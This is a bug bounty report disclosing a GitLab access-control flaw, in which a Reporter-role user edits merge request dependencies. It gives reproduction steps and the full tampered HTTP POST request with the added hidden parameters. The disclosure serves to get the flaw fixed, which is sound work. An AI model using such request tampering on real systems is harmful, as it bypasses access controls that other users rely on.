Reporter Able to Edit Merge Requests Dependencies

HackerOne report #743339 by rafiem on 2019-11-21, assigned to @jeremymatos:

Hi Team,

I have found improper access control on gitlab merge request system. There is a new feature in merge requests, which is merge request dependencies. This settings make the MR that being edited, cannot be merged unless the dependencies MR already merged. Even if i dont find spesific rule permission of the merge request dependencies, i am sure that this settings can only be edited by at least user with Developer rule (Same as editing assigned user, label). In this case, user with Reporter role are able to change and edit the merge request dependencies.

Proof of Concept

1.) User A have public or private project ( In this report i use : https://gitlab.com/bambangyera/mokil)
2.) User A add some branch to it
3.) User A then create random MR
4.) User A invite User B as Reporter to the project
5.) User B then create MR from the branch
6.) User B then try to edit the MR that he/she created (In this report i use : bambangyera/mokil!4)
7.) As we can see, there is no option for editing the MR dependencies
8.) User B then turn on burp suite and then intercept the request for editing the MR
9.) In the body part of the POST request, add parameter merge_request%5Bblocking_merge_request_references%5D%5B%5D with value url that contain MR dependencies and parameter merge_request%5Bupdate_blocking_merge_request_refs%5D with value true :

POST /bambangyera/mokil/merge_requests/4 HTTP/1.1  
Host: gitlab.com  
Connection: close  
Content-Length: 362  
Cache-Control: max-age=0  
Origin: https://gitlab.com  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36  
Sec-Fetch-User: ?1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Referer: https://gitlab.com/bambangyera/mokil/merge_requests/4/edit  
Accept-Encoding: gzip, deflate  
Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7  
Cookie: <REDACTED>

utf8=%E2%9C%93&_method=patch&authenticity_token=REDACTED2%3D%3D&merge_request%5Btarget_branch%5D=test&merge_request%5Btitle%5D=POC&merge_request%5Bdescription%5D=aaaaaaa&merge_request%5Bapprovals_before_merge%5D=0&merge_request%5Bsquash%5D=0&merge_request%5Block_version%5D=4&merge_request%5Bblocking_merge_request_references%5D%5B%5D=https%3A%2F%2Fgitlab.com%2Fbambangyera%2Fmokil%2Fmerge_requests%2F1&merge_request%5Bupdate_blocking_merge_request_refs%5D=true  

10. Forward the request
11. As result, MR dependencies added to the MR that being edited, even if the user (reporter role) dont have or see the option when editing the MR

<>PoC video attached
PoC.webm

Impact

User with role reporter able to edit MR dependencies

Best Regards,
[@]rafiem

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

• PoC.webm